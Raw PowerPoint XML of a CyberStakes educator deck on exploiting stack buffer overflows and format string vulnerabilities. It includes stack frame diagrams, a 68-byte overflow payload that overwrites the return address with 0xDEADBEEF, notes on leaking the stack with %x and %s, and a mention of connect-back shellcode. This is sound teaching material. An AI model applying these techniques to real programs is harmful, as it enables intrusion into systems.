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56"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId57"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="877" r:id="rId3"/>
    <p:sldId id="839" r:id="rId4"/>
    <p:sldId id="840" r:id="rId5"/>
    <p:sldId id="841" r:id="rId6"/>
    <p:sldId id="842" r:id="rId7"/>
    <p:sldId id="843" r:id="rId8"/>
    <p:sldId id="844" r:id="rId9"/>
    <p:sldId id="962" r:id="rId10"/>
    <p:sldId id="963" r:id="rId11"/>
    <p:sldId id="964" r:id="rId12"/>
    <p:sldId id="846" r:id="rId13"/>
    <p:sldId id="847" r:id="rId14"/>
    <p:sldId id="849" r:id="rId15"/>
    <p:sldId id="848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959" r:id="rId32"/>
    <p:sldId id="960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3" r:id="rId41"/>
    <p:sldId id="874" r:id="rId42"/>
    <p:sldId id="875" r:id="rId43"/>
    <p:sldId id="876" r:id="rId44"/>
    <p:sldId id="970" r:id="rId45"/>
    <p:sldId id="971" r:id="rId46"/>
    <p:sldId id="972" r:id="rId47"/>
    <p:sldId id="973" r:id="rId48"/>
    <p:sldId id="974" r:id="rId49"/>
    <p:sldId id="975" r:id="rId50"/>
    <p:sldId id="976" r:id="rId51"/>
    <p:sldId id="978" r:id="rId52"/>
    <p:sldId id="982" r:id="rId53"/>
    <p:sldId id="951" r:id="rId54"/>
    <p:sldId id="83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877"/>
            <p14:sldId id="839"/>
            <p14:sldId id="840"/>
            <p14:sldId id="841"/>
            <p14:sldId id="842"/>
            <p14:sldId id="843"/>
            <p14:sldId id="844"/>
            <p14:sldId id="962"/>
            <p14:sldId id="963"/>
            <p14:sldId id="964"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Control Flow Recap" id="{BE1A66DE-38CE-224B-99CC-769A022F23F6}">
          <p14:sldIdLst>
            <p14:sldId id="846"/>
            <p14:sldId id="847"/>
            <p14:sldId id="849"/>
            <p14:sldId id="848"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Buffer Overflows" id="{A90D30A3-D7E5-784F-A7DE-FB4C1ACD3F1F}">
          <p14:sldIdLst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</p14:sldIdLst>
        </p14:section>
        <p14:section name="Shellcode" id="{3B835758-11BD-4B45-8751-71C8C0FBB473}">
          <p14:sldIdLst>
            <p14:sldId id="858"/>
            <p14:sldId id="859"/>
            <p14:sldId id="860"/>
            <p14:sldId id="861"/>
            <p14:sldId id="862"/>
            <p14:sldId id="863"/>
            <p14:sldId id="864"/>
            <p14:sldId id="959"/>
            <p14:sldId id="960"/>
            <p14:sldId id="865"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Format String Attacks" id="{C198C8D7-F1D0-A440-8944-3E427CAE3CF9}">
          <p14:sldIdLst>
            <p14:sldId id="866"/>
            <p14:sldId id="867"/>
            <p14:sldId id="868"/>
            <p14:sldId id="869"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Variadic Function Detour" id="{3ED85DE9-9F34-874D-92EE-1F5FFD93C864}">
          <p14:sldIdLst>
            <p14:sldId id="870"/>
            <p14:sldId id="871"/>
            <p14:sldId id="873"/>
            <p14:sldId id="874"/>
            <p14:sldId id="875"/>
            <p14:sldId id="876"/>
            <p14:sldId id="970"/>
            <p14:sldId id="971"/>
            <p14:sldId id="972"/>
            <p14:sldId id="973"/>
            <p14:sldId id="974"/>
            <p14:sldId id="975"/>
            <p14:sldId id="976"/>
            <p14:sldId id="978"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="ret2libc" id="{509DA307-4ACD-8245-A2E9-AFBC29AAE385}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Defeating ASLR" id="{5F084D6C-3A0A-E346-A931-80B5BE75F6C9}">
          <p14:sldIdLst>
            <p14:sldId id="982"/>
            <p14:sldId id="951"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Canaries" id="{699CA3B4-8813-4B4B-86D1-235632BBD062}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="NX" id="{BFB083B2-6776-D84E-A662-97AB2A1C4290}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="ASLR" id="{72A280AE-2128-A441-848E-70DED6511140}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Format String Cont" id="{1A9E4114-273E-314F-8FFF-B281A2A57AB5}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="What's New" id="{125C1F6D-FF52-2842-B40B-38A0F335E731}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Conclusion" id="{FAD998B4-7667-8F40-A1A8-42BF6A185D67}">
          <p14:sldIdLst>
            <p14:sldId id="8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77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="-2344" y="-104"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1392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commentAuthors" Target="commentAuthor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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> put at 0xDEADBEEF? Or rather, what should we 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legal except members of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>structs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, but compiler may still pad inside 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modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the IP address and or port for a connect back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode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once mixed, you need conventions.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but bad guys break conventions.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9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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> course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are interpreted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there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is no callee-save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interrelated:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> if you can hijack control flow into an infinite loop, or have a program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>out its stack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70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Treat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fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as a string, print it out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Print out format as a string, and then print ‘%’ because it’s the first charter in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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Last 2 things </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> printed are saved 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 and saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. note that each %x is a 4 byte read, so 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> out is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>addr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fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, then next 8 are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, the 10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out is the saved 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, and the 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> out is the saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>eip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will skip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2, and print the string at the address signified by the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dword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. This motivates the next slide, on which we write the address to the beginning of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before we do %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>x%s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9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in foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>bonus question: what do you think the 516 digit number will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name of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the register that contains the address of the current instruction?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E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Have you figured out who Aleph One is?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> encourage you to use your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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to learn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>more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here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is predetermined 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byte of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is 0;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in little endian, that’s the least significant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tags" Target="../tags/tag84.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85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slideMaster" Target="../slideMasters/slideMaster2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tags" Target="../tags/tag99.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag100.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag101.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xm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slideMaster" Target="../slideMasters/slideMaster2.xml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Master" Target="../slideMasters/slideMaster2.xml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slideMaster" Target="../slideMasters/slideMaster2.xml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tags" Target="../tags/tag119.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag120.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag115.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11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tags" Target="../tags/tag124.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag125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121.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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tags" Target="../tags/tag130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11/7/14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16A47FA-0CEA-6947-B0F7-FA97FCD430B2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224741A-E944-D140-BC85-0B12196E47E2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8E2CF58-ABF8-1542-93D6-7995FC9E4430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24FFC89-921A-FF44-8D48-0826225D1EE5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2A3E-4BFE-AF46-B61A-E662D0A37735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2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07D8CFC-0178-204C-AB67-9348AB6D8B74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55D26C-3C72-B548-AB96-9791FD0CCC94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18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62C055-4756-1D4B-84FC-6EEB2240FC7D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85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9C52985-00EB-6941-9B53-ECA48ECB33FB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7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10A4823-B443-034C-8E87-89416A62590B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27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F6D151D-3159-114B-B1DE-9001868E6E90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21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0E3A481-0504-AD45-AE58-E2170EFE9EB5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5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11/7/14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11/7/14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11/7/14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tags" Target="../tags/tag66.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag67.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag69.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag70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11/7/14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D4E1B4A-1481-9A4D-AA6D-3A68B1E1E51A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld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13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2600" y="3263471"/>
            <a:ext cx="6477000" cy="654313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/>
              <a:t>Exploiting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Buffer Overflows and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Format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities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564880"/>
            <a:ext cx="45719" cy="1447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308" y="2730851"/>
            <a:ext cx="1083329" cy="1115858"/>
            <a:chOff x="252308" y="2855212"/>
            <a:chExt cx="1083329" cy="1115858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="CYBERSTAKES_LOGO_Black-djb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55" y="2855212"/>
              <a:ext cx="768035" cy="8671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52308" y="3724849"/>
              <a:ext cx="108332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600" dirty="0" smtClean="0"/>
                <a:t>CyberStakes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3974068"/>
            <a:ext cx="282128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Educate the Educator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94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you already teach cyber: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Have a set of slides to potentially augment your own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Understand how we teach exploitation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do not have background, understand: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Buffer overflows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Format string vulnerabilities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ret2text and ret2libc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...all with a bent towards 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263598"/>
            <a:ext cx="2362200" cy="53340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2362200" cy="533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File system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1461374"/>
            <a:ext cx="1752600" cy="2805826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Binary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1" y="2057400"/>
            <a:ext cx="1295399" cy="1981200"/>
            <a:chOff x="1066801" y="2057400"/>
            <a:chExt cx="1295399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1066801" y="2057400"/>
              <a:ext cx="1295399" cy="6858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Code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1" y="2819400"/>
              <a:ext cx="1295399" cy="6096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6801" y="3581400"/>
              <a:ext cx="1295399" cy="4572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...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38600" y="36576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8600" y="46482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667000"/>
            <a:ext cx="2362200" cy="10668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3999" y="1535668"/>
            <a:ext cx="3806968" cy="1131332"/>
            <a:chOff x="5333999" y="1535668"/>
            <a:chExt cx="3806968" cy="1131332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="3" name="Elbow Connector 2"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="21" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5333999" y="1997333"/>
              <a:ext cx="2476501" cy="669667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35668"/>
              <a:ext cx="31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Fetch, decode, execute</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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33999" y="3733800"/>
            <a:ext cx="2802637" cy="1840775"/>
            <a:chOff x="5333999" y="3733800"/>
            <a:chExt cx="2802637" cy="1840775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333999" y="3810000"/>
              <a:ext cx="2476501" cy="3810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1" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5333999" y="3733800"/>
              <a:ext cx="2476501" cy="13716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19800" y="5112910"/>
              <a:ext cx="211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read and write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597E-6 3.98334E-6 L 0.34572 -0.06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6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Hijack: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always Computation + Control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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean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90775"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="933450" y="2515059"/>
          <a:ext cx="72771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2209800"/>
                <a:gridCol w="1104900"/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267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injection</a:t>
            </a:r>
          </a:p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eap metadata overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>return-oriented programming</a:t>
            </a:r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092700" y="4267200"/>
            <a:ext cx="304800" cy="16002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86400" y="4313237"/>
            <a:ext cx="3352800" cy="132556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Same principle,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different mechanism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1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cdecl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the default for Linux &amp;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954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orange(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a,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b)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char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[16];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c, d;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if(a &gt; b)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c = a;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else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c = b;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d = red(c,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return d;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9439"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6185958" y="1142999"/>
          <a:ext cx="1752600" cy="5600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28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59243" y="2773678"/>
            <a:ext cx="1100454" cy="646331"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="110045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8229600" y="3429000"/>
              <a:ext cx="830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r>
                <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                <a:t>frame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959243" y="4342229"/>
            <a:ext cx="1017511" cy="646331"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1017511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8229600" y="3429000"/>
              <a:ext cx="747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i="1" dirty="0" smtClean="0"/>
                <a:t>stack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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79809" y="1513840"/>
            <a:ext cx="1692391" cy="722531"/>
            <a:chOff x="4479809" y="1828800"/>
            <a:chExt cx="1692391" cy="722531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Left Brace 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="1828800"/>
              <a:ext cx="304800" cy="722531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9809" y="1866900"/>
              <a:ext cx="139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parameter</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>area (caller)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51869" y="2246531"/>
            <a:ext cx="1320331" cy="2293817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869" y="3214206"/>
              <a:ext cx="1021095" cy="132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orange’s</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>initial</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br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dirty="0" smtClean="0"/>
                <a:t>frame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5063" y="4545648"/>
            <a:ext cx="1817137" cy="1093152"/>
            <a:chOff x="4355063" y="2658280"/>
            <a:chExt cx="1817137" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Left Brace 48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063" y="2873479"/>
              <a:ext cx="1517901" cy="21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to be created</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>before</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>calling</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>red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85958" y="4535488"/>
            <a:ext cx="1752600" cy="220677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42502" y="5638800"/>
            <a:ext cx="1729698" cy="1088265"/>
            <a:chOff x="4442502" y="2658280"/>
            <a:chExt cx="1729698" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Left Brace 24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2502" y="3195253"/>
              <a:ext cx="1430462" cy="15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after red has</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>been called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8305800" y="4988560"/>
            <a:ext cx="472440" cy="1371600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rtlCol="0" anchor="ctr" anchorCtr="1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grow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195554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Buffer Overflows?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buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>occurs when data is written </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>outside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of the space allocated for the buffer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>C does not check that writes are in-bound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Stack-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>covered in this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Heap-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>more advanced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>very dependent on system and library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0x080483f7 &lt;+19&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng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74312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 47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6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55154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“123456”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28375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123456\0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4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8906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8832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… (64 in total)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“A”x68 . “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xBE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xDE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61831" y="2221468"/>
            <a:ext cx="1367569" cy="1097464"/>
            <a:chOff x="5261831" y="2221468"/>
            <a:chExt cx="1367569" cy="1097464"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/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smtClean="0"/>
                <a:t>corrupted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smtClean="0"/>
                <a:t>overwritten</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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smtClean="0"/>
                <a:t>overwritten</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p: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9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722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Cambria"/>
              </a:rPr>
              <a:t>Black</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16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40" y="2895599"/>
            <a:ext cx="2377760" cy="208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0596" y="4339535"/>
            <a:ext cx="203060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format c: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" y="2286002"/>
            <a:ext cx="2590800" cy="37337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  <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>White</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="appst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0" y="2895600"/>
            <a:ext cx="2377760" cy="2084848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="wifi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" y="3943643"/>
            <a:ext cx="1047995" cy="1003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ounded Rectangular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1501280"/>
            <a:ext cx="1447800" cy="708520"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 35728"/>
              <a:gd name="adj2" fmla="val 274264"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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Cambria"/>
              </a:rPr>
              <a:t>Bug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92480" y="1289579"/>
            <a:ext cx="2795437" cy="3860431"/>
            <a:chOff x="3092478" y="1289579"/>
            <a:chExt cx="2795437" cy="3860430"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="bom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34412">
              <a:off x="3104415" y="1964402"/>
              <a:ext cx="3352800" cy="2003154"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11" descr="arrow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5549">
              <a:off x="3092478" y="3352800"/>
              <a:ext cx="2795437" cy="1797209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2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7387" y="589003"/>
            <a:ext cx="2379809" cy="80021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5200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Exploits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8746" y="3778830"/>
            <a:ext cx="1083854" cy="1301485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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956235 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 76309 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX37" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY37" fmla="*/ 1603 h 1301485"/>
